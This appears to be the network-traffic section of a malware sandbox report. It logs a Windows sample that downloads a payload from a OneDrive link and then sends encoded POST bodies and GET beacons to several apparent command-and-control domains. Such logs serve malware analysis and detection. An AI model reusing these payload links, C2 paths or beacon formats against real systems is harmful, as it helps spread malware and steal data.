                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.valerieomage.com
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Jul 23, 2024 14:50:11.389540911 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Jul 2024 12:50:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Sorting-Hat-PodId: 223
                                                            X-Sorting-Hat-ShopId: 70582403296
                                                            X-Storefront-Renderer-Rendered: 1
                                                            location: https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX
                                                            x-redirect-reason: https_required
                                                            x-frame-options: DENY
                                                            content-security-policy: frame-ancestors 'none';
                                                            x-shopid: 70582403296
                                                            x-shardid: 223
                                                            vary: Accept
                                                            powered-by: Shopify
                                                            server-timing: processing;dur=13;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="rp5m", requestID;desc="de436c6d-907f-46cb-b6a1-099ee3e8e05e-1721739011"
                                                            x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                            x-request-id: de436c6d-907f-46cb-b6a1-099ee3e8e05e-1721739011
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=njf6VDuA1IYmBYNk1xx0zPBEv05pAeOmb93ciyDhupxkTotAvWZNSknzFXuuiGfpAmBVNWELlye15h%2FMFnvsvlMPRirACWQms1FyD%2BbfT80Wy%2BRCbOdw%2FtNbuLNtZN1iyCiPhRBo"}],"group":"cf-nel","max_age":60480
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jul 23, 2024 14:50:11.389564991 CEST  343  IN
                                                            Data Ascii: }NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=72.999716X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Opti


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            1  192.168.2.5  49728  84.32.84.121  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:39.936696053 CEST  819  OUT  POST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 204
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
                                                            Jul 23, 2024 14:50:40.420574903 CEST  1218  IN  HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 2aa70a4d74fdb6beba5b9b19f5ba2277-bos-edge1
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            2  192.168.2.5  49730  84.32.84.121  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:42.475423098 CEST  839  OUT  POST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 224
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMYhBLQ4l6si5ZetpzPW5Unsca0b2dXtdrMUACnA
                                                            Jul 23, 2024 14:50:42.942187071 CEST  1218  IN  HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 104bbecd9a7e42ab875182146077952f-bos-edge1
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.000
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            3  192.168.2.5  49732  84.32.84.121  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:45.114217997 CEST  1856  OUT  POST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 1240
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG= [TRUNCATED]
                                                            Jul 23, 2024 14:50:45.608026028 CEST  1218  IN  HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: d4311b9f9126d77879543371cf365a3a-bos-edge2
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            4  192.168.2.5  49734  84.32.84.121  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:47.676683903 CEST  543  OUT  GET /ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.kosherphonestore.com
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Jul 23, 2024 14:50:48.333549023 CEST  1236  IN  HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 74467f51a2cd8674a3d2c46eed47e08f-bos-edge2
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin
                                                            Jul 23, 2024 14:50:48.333570957 CEST  128  IN
                                                            Data Ascii: -top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                            Jul 23, 2024 14:50:48.569380999 CEST  1236  IN  HTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/?oBG=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&3F=ZLtxCXoX
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 74467f51a2cd8674a3d2c46eed47e08f-bos-edge2
                                                            x-hcdn-cache-status: MISS
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            5  192.168.2.5  49739  43.155.26.241  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:53.828190088 CEST  798  OUT  POST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 204
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+RzemsDBZ9ZUOGMxVvUaZDEcSOkLQiZRfJne77PnI=


                                                            Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                            6  192.168.2.5  49742  43.155.26.241  80  1600  C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jul 23, 2024 14:50:56.363245964 CEST  818  OUT  POST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 224
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOvVcLqUIBivOr8myABfGcCbOTQ7x9zsBr3ki++R8WrAdcs4StcJOtOBeksdQO0tkdPWUVdOwQnDhcRABYOrToC2exMhdc8Aj/VLHu7UnfToVfV0ReLStlPG5smePyQBGF+aJH4FO4RrX8+20YYVIh+g99rLRwceQib1oBoCEPsaj3xxLqnv


                                                            Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49744 | Destination IP: 43.155.26.241 | Destination Port: 80 | PID: 1600 | Process: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp: Jul 23, 2024 14:50:58.908078909 CEST | Bytes transferred: 1835 | Direction: OUT | Data:
                                                            POST /kwl6/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.cwgehkk.store
                                                            Origin: http://www.cwgehkk.store
                                                            Referer: http://www.cwgehkk.store/kwl6/
                                                            Content-Length: 1240
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Ascii: oBG= [TRUNCATED]


                                                            Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49746 | Destination IP: 43.155.26.241 | Destination Port: 80 | PID: 1600 | Process: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            Timestamp: Jul 23, 2024 14:51:01.440617085 CEST | Bytes transferred: 536 | Direction: OUT | Data:
                                                            GET /kwl6/?3F=ZLtxCXoX&oBG=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.cwgehkk.store
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                                                            Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 4416 | Process: C:\Users\user\Desktop\4Ear91jgQ7.exe
                                                            Timestamp: 2024-07-23 12:49:18 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:49:18 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mxEYTjyjp5LfgrlSoxPuo-qFG-8J5AXctRyKSa4F8HTVl2y0jju6xUKiA_toKgQU3XKSLq2mvSzYTkAdNcGbO3lvQDjwGCNX6f5opDmIAdm52vOSlaKsdGBDd1BEVvBGlENE-DFpAecxHCicQpqY-yiQmmGUhcKrKtEdGoY6JFwiOBu7IIolGtBighwA0QHWJfTaN6zBw6uAOr6k9PDj-3w/1336?download&psid=1
                                                            Set-Cookie: E=P:AkSx3RWr3Ig=:Q5BzX0ZBA3mWzpssx0Kj3y33On7C3kN0lnOCoJ7m8iM=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=17381c14-b7b1-45ab-8d56-2dbc68f5c1a8&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:18 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:18 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-fqg89
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 2935FCB38F184E86A17FF352E9505947 Ref B: BN3EDGE0616 Ref C: 2024-07-23T12:49:18Z
                                                            Date: Tue, 23 Jul 2024 12:49:17 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49706 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 6180 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Timestamp: 2024-07-23 12:49:33 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:49:34 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mUBDVxFL0Km4dF6fb4nRGW7ZdjXIi96DMwMDKod96AJlGSBshmayLs2aYjkMajC8mdc4HRzWHAgIcDSJPiH_JdOuFxJ2usqP2YgHb6XTEQTux3BsCY8tt-_oMmKZtHo-wuMHyokrHeEPQCyze6t6OkqtZ7AF4WWKRN5LWAhMW4q12K67tsVBZ2nqSsJLTsMxP9ugVcMpDbE4MbVIvpZXBZA/1336?download&psid=1
                                                            Set-Cookie: E=P:FO8O5xWr3Ig=:VBGFQJuwEnmTLcg7P7ACz3QvXIEeMKUSdHx0ZBuPpf0=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=eacd8d01-6a3b-4f8c-9055-b9007a13533d&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:33 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:34 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-4r4mg
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 9798D21CCCD94855A052B7EB5DE21ECE Ref B: BN3EDGE0715 Ref C: 2024-07-23T12:49:33Z
                                                            Date: Tue, 23 Jul 2024 12:49:34 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49716 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 3840 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif
                                                            Timestamp: 2024-07-23 12:49:42 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:49:43 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mfqQtLozj-9TM6Ba0WtMrYNaZZLYdZifHt7JSgEAwVuBfWo_gNuWKsrXMDkmnGIRA0cG5FuFHrIfpRICMFZfHoG8IE55Eut8d-PRO-LGsqGertC-_YxpZqpkopn3OerOQs1CCMpnBmmffUswTT4BTTzm7Iiodtw3gmr-oX_p5tqfmpXOYOpLJxIAjs_wp5mh1pM3Gnp5QZ8LqiMBTIToIIg/1336?download&psid=1
                                                            Set-Cookie: E=P:NGhp7BWr3Ig=:Jz8q192T5rK6i8LXNtgQVmr+d1ovYoiaSaKj8LEvK58=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=8dc66c6a-5c89-4064-9a44-306e43368f28&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:42 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:43 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 798f966fd6-vw84v
                                                            X-ODWebServer: nameastus2946819-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: 43B8FF83EF254E7895A925C3A115F70F Ref B: BN3EDGE0208 Ref C: 2024-07-23T12:49:42Z
                                                            Date: Tue, 23 Jul 2024 12:49:42 GMT
                                                            Connection: close
                                                            Content-Length: 0


                                                            Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49718 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 6436 | Process: C:\Users\user\Documents\4Ear91jgQ7.pif.pif
                                                            Timestamp: 2024-07-23 12:49:54 UTC | Bytes transferred: 131 | Direction: OUT | Data:
                                                            GET /download?resid=7EE64AC18753AFFC%2120205&authkey=!AMApivMuhke2MOo HTTP/1.1
                                                            Host: onedrive.live.com
                                                            Connection: Keep-Alive
                                                            Timestamp: 2024-07-23 12:49:54 UTC | Bytes transferred: 1166 | Direction: IN | Data:
                                                            HTTP/1.1 302 Found
                                                            Cache-Control: no-cache, no-store
                                                            Pragma: no-cache
                                                            Content-Type: text/html
                                                            Expires: -1
                                                            Location: https://cdsf1g.db.files.1drv.com/y4mUzOlIfy49nah4fKlzCWhYlTPZUFu9vAgDNS-S_X2t_nL0Y-9XGqjLW3kaagbac6FGeSujISYiqn8BzuMz0Hyvc_oodwJjz_d7X825emRpaTdVvUumJuV-Q1HF1YgQ4jGpZr8Wc8SFpt3KIrFfvOjWX3DF5kEy80rleGOmrZy7TcxO7_W80jH_h2sVkAbwdjDDh3FGNTupNUo2p9gybOGbQ/1336?download&psid=1
                                                            Set-Cookie: E=P:18wi8xWr3Ig=:dWvH0WTJitfTUJ4KF+7+K2HQr2Z/lhhh3uDhTRtFriI=:F; domain=.live.com; path=/
                                                            Set-Cookie: xid=9228e1df-d7cb-4223-afa8-71453f70621e&&ODSP-ODWEB-ODCF&247; domain=.live.com; path=/
                                                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                            Set-Cookie: LD=; domain=.live.com; expires=Tue, 23-Jul-2024 11:09:54 GMT; path=/
                                                            Set-Cookie: wla42=; domain=live.com; expires=Tue, 30-Jul-2024 12:49:54 GMT; path=/
                                                            X-Content-Type-Options: nosniff
                                                            Strict-Transport-Security: max-age=31536000
                                                            X-MSNServer: 656bc47b7b-c4dpk
                                                            X-ODWebServer: nameastus2708987-odwebpl
                                                            X-Cache: CONFIG_NOCACHE
                                                            X-MSEdge-Ref: Ref A: FDC33A6A127E4DE8B6F5758F53D8EFC7 Ref B: BN3EDGE0809 Ref C: 2024-07-23T12:49:54Z
                                                            Date: Tue, 23 Jul 2024 12:49:54 GMT
